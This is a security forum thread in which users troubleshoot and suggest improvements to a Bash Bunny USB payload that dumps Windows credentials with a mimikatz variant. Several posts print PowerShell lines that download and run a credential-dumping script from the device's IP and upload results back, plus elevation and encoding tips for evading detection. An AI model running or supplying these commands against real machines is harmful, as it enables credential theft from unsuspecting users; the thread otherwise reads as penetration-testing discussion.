Jump to content

Violation of CoC

illwill

By illwill
in Payloads

 Share

Recommended Posts

SixthOfGod Newbie

SixthOfGod

Posted
Posted

When I run it, it's stalling out at the " WebServer started and Uploading Results" stage.  Initially I thought it might be because I run as a full-time vpn client, and that was messing up the routes.  But, I disabled the VPN, and it's still stalling out.  I'll try to step through the attack manually, and see where it's breaking down.

  • Upvote 1
Link to comment
Share on other sites
azzarin Newbie

azzarin

Posted
Posted (edited)

So far this just wiped everything in the loot folder. 

 

Tested on Windows 10. 

Going to do some more tests. 

 

Getting this, might be the problem: 

C:\WINDOWS\system32>powershell -c \"while \(\$true\) \{ If \(Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit\"\}\}
At line:1 char:91
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                      ~
Unexpected token '\' in expression or statement.
At line:1 char:92
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                       ~
Unexpected token '}' in expression or statement.
At line:1 char:94
+ ... (Test-Connection 172.16.64.1 -count 1 -quiet\) \{ sleep 2\; exit"\}\}
+                                                                         ~
Unexpected token '}' in expression or statement.
    + CategoryInfo          : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : UnexpectedToken
 

Edited by azzarin
Link to comment
Share on other sites
korang Newbie

korang

Posted
Posted (edited)

So when I try to run this on a laptop with certain policies in the place, the CMD command asks for credentials to load when then causes the whole script to fail after that point as command prompt does not get executed.  SO I think that bypassing UAC in this method is not working, in my situation.

Edited by korang
Link to comment
Share on other sites
azzarin Newbie

azzarin

Posted
Posted (edited)
17 hours ago, illwill said:

you cant copy the code directly and paste it into a cmd prompt because theres backslashes that are escaping special characters....

I just made it pause for longer. I did not copy it. i ll try again. Have you tried on Windows 10 ?

It might have to do with the language. When it types the line in "cmd" i can see special charecter. and it looks the same as i posted before.

Tried on 2 PCs with Windows 10.

 

And thanks for making this.

Edited by azzarin
Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

I was reading through the script and noticed in some instances what korang says happens.  I found out in my travels with the Rubber Ducky not all windows have GUI r set to open run.  Only particular machine (SHIFT-CTRL-ENTER) does not run something as admin.  Have not looked into why.

I just got the BB last week, seen this script and see some improvements that can be made.  My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all WIndows 7 and up boxes.  This is not anyway a diss of what is currently there.  I just have ideas to improve it more.  Also, want to do wat BunnyTap does and use a Node server instead of Python.  I love Python, I use it alot.  Just trying other things.

"Discovery is done through experimentation"..Dr. Whitehall (Marvel)

 

Secret I use for admin is instead of using cmd by itself, I use powershell to run it and get the same prompting result as the CTRL-SHIFT-ENTER would do. 

powershell -c "Start-Process cmd -verb runas"

Now i don't have to worry about those shortcut keys not working.

 

Also for the yes command after the prompt an ALT-Y works best for selecting it.

Also also found myself building my own agents to fire off a UAC bypass script that will launch my actual script.  I did this a few times for fun but takes up another 5-10 seconds at the terminal to complete so not practical in a time crunch.

 

Lastly, I see a lot of clear text scripts in Powershell.  I always reduce and then encode my Powershell scripts.  Help to avoid having to escape character stuff since Base64 is universal.  I am going to post some of my tricks from Powershell Empire, Powersploit and Rubber Ducky experiences with Powershell that can be translated to the BB here shortly today.

Link to comment
Share on other sites
azzarin Newbie

azzarin

Posted
Posted
57 minutes ago, PoSHMagiC0de said:

I was reading through the script and noticed in some instances what korang says happens.  I found out in my travels with the Rubber Ducky not all windows have GUI r set to open run.  Only particular machine (SHIFT-CTRL-ENTER) does not run something as admin.  Have not looked into why.

I just got the BB last week, seen this script and see some improvements that can be made.  My first project to get acclimated with the BB is to do a rewrite of this in a way that will work on all WIndows 7 and up boxes.  This is not anyway a diss of what is currently there.  I just have ideas to improve it more.  Also, want to do wat BunnyTap does and use a Node server instead of Python.  I love Python, I use it alot.  Just trying other things.

"Discovery is done through experimentation"..Dr. Whitehall (Marvel)

 

Secret I use for admin is instead of using cmd by itself, I use powershell to run it and get the same prompting result as the CTRL-SHIFT-ENTER would do. 


powershell -c "Start-Process cmd -verb runas"

Now i don't have to worry about those shortcut keys not working.

 

Also for the yes command after the prompt an ALT-Y works best for selecting it.

Also also found myself building my own agents to fire off a UAC bypass script that will launch my actual script.  I did this a few times for fun but takes up another 5-10 seconds at the terminal to complete so not practical in a time crunch.

 

Lastly, I see a lot of clear text scripts in Powershell.  I always reduce and then encode my Powershell scripts.  Help to avoid having to escape character stuff since Base64 is universal.  I am going to post some of my tricks from Powershell Empire, Powersploit and Rubber Ducky experiences with Powershell that can be translated to the BB here shortly today.

Looking forward to see what you bring to the table.

Link to comment
Share on other sites
azzarin Newbie

azzarin

Posted
Posted
1 hour ago, azzarin said:

I just made it pause for longer. I did not copy it. i ll try again. Have you tried on Windows 10 ?

It might have to do with the language. When it types the line in "cmd" i can see special charecter. and it looks the same as i posted before.

Tried on 2 PCs with Windows 10.

 

And thanks for making this.

Changed to English keyboard, it helped a bit, but does not connect back to the bashbunny. Fails to connect. 

Link to comment
Share on other sites
hexa Newbie

hexa

Posted
Posted

First off all, Thanks for the great payload,

Secondly, unfortenately at first it didn't work, So after putting a pause in the payload I could see why it didn't work.

The powershell command  creates a typo (i quess it has to do with the keyboard layout),look at  the end where the name of the file creates ÉOF instead of 'EOF'

  •  part of the output: ew-Object Net.WebClient).UploadString('http://172.16.64.1/EOF',ÉOF');

So I solved the problem by changing all the file names EOF into DOF.   That way the payload creates a file 'DOF' and works create.

Also change the name In the file server.py ( EOF in DOF), change it in whatever you like but avoid the letter E and A sinds É also exists

I would suggest to change it in the original payload? Since more people use a US keyboardlayout.

Anyway Thanks for the payload and keep up the good work!

 

Link to comment
Share on other sites
qdba Newbie

qdba

Posted
Posted

Good Work, 

I had the same idea because I'm pentesting a company who had forbidden USB Storage and Internet  access per Policy. They have a good firewall with contenfilter and only a few Internet pages will be allowed. So you saved me a lot of time coding the stuff... :cool: :rolleyes: Thank you ....

One idea...

.... the whole QUACK stuff takes a lot of time. To save attack time put a lot of the QUACK code into the powershellcode.  I had done it with your CredDump Payload.

 https://github.com/qdba/bashbunny-payloads/tree/master/payloads/DumpCreds

 

Only a suggestion. You do a really good work anyway. 

 

 

Link to comment
Share on other sites
  • 2 weeks later...
  • 1 month later...
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

I haven't testing IWill's payload since he built it.  I just seen he built it and looked cool from a code point of view.  I know he had timing issues in the beginning.  Best way is to test.  To test, in his payload.txt, edit it and remove the hidden parameter.  This will make everything it does visible.  See if any red errors go flying across the screen.

You can edit the first line of ps1 also, for testing only, to see if mimi is even running and sending output.  At the bottom will be the example of using tee-object to put output in a variable and display it to console so you see the output on the windows machine and still capture it in the "o" variable.

I have not gave his payload a go yet directly to see the interaction.  I like his python server and the kill command he sends at the end to close it out rather than leave it running in the background all day. 

IEX (New-Object Net.WebClient).DownloadString('http://172.16.64.1/md.ps1');Invoke-Mimidogz -DumpCred | tee-object -Variable o

 

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

Info on this module and similar ones.

If you are trying to run Mimi-whatever on a fully updated Windows 10 machine or even powerdump, good luck.  It has been hardened against these.  Avast is even able to sniff execution in Win 10  so it will detect mimikatz but not dogz but dogz will get nothing still.  Powerdump will throw an illegal ptr operation.  Exploitation frameworks are having the same issue.  Windows 7 seems to not have this issue.

 

Avast will detect the exploitation framework too, freeze the operation of it coming up and inform the user of something funny going on and if they want to ignore or kill the process.  The challenge is now on.

So, on Windows 10 MS is making it tougher to steal creds in memory.  Windows 7 shouldn't have no concern.  Of course Win 10 people have to worry about MS spying on them with the Creator Update.

  • Upvote 1
Link to comment
Share on other sites
HeadScratchCode Newbie

HeadScratchCode

Posted
Posted

This is one of the best payloads. Even if you can't snag the plain text (windows 10) you still get the password hashes. If you can't get it working. just add a few more DELAYs.

As, I'm in China, I have to add Q SHIFT once it opens the terminal. This is because many systems use a pinyin input method that switches back and forth from English to Chinese by pressing SHIFT. If I don't, the terminal will fill up with Chinese characters.

Great payload dude!

Link to comment
Share on other sites
PoSHMagiC0de Rookie

PoSHMagiC0de

Posted
Posted

On my updated WIn10 Pro machine and image it fails.  The injects that some payloads need to do are not allowed anymore, even with PS2.0 enabled.  Update the Win10 machine to the latest updates and you may see the same.  If it is Win10 Home, I then do not know how it will work.

 

I noticed any exploit framework I have the process injects are failing now on Win10.

 

Link to comment
Share on other sites
b0N3z Rookie

b0N3z

Posted
Posted

I tried to mess around with mimikatz on win 10 and it denied me every time no matter what directory I used or even as an admin.

Link to comment
Share on other sites
  • 3 weeks later...
KenPC Newbie

KenPC

Posted
Posted (edited)

Sorry for a stupid question, but where to put the md.ps1, server.py and p.ps1 to get this to work?

 

root of the bashbunny filesystem or in the USB storage FS?

 

Edit: after looking at the payload .txt, I noticed it's calling it in $switchdir. I got it now.

 

EDIT2: anyone having issues with it waiting for the websever, but it's up and hosting p.ps1.

When I manually run it, the BB goes green. Otherwise it just sits flashing blue forever.

Running on Windows7pro base install fully up to date.

 

I'm no ps pro otherwise i'd debug myself :/ I'm more of a Physical Penetration-ist myself. Just dabbled in some coding.

Edited by KenPC
Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
 Share
Go to topic listing

  • Recently Browsing   0 members

    • No registered users viewing this page.
×
×
  • Create New...